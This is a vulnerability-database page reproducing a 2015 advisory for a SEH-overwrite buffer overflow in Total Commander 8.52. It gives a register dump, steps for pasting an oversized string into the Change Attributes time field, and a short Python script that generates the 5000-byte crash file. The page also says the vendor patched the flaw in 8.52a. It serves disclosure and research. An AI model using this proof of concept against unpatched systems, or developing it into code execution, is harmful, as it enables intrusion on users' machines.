Vulners
Lucene search
Total Commander 8.52 - Overwrite Buffer Overflow (SEH)
'''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************
[Info:]
EAX 00106541
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC
EBP 41414141
ESI 04930088
EDI 0031E9B0
EIP 41414141
SEH chain of main thread, item 0
Address=001065FC
SE handler=41414141
'''
[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Goto Files -> Change Attributes.
3- In time field paste in contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.
[Code for CRASH.txt]
file = open("crash.txt",'w')
file.write("A"*5000)
file.close()
->After Reporting,
Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).
**********************************************************************************************Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Sep 2015 00:00Current
7.4High risk
Vulners AI Score7.4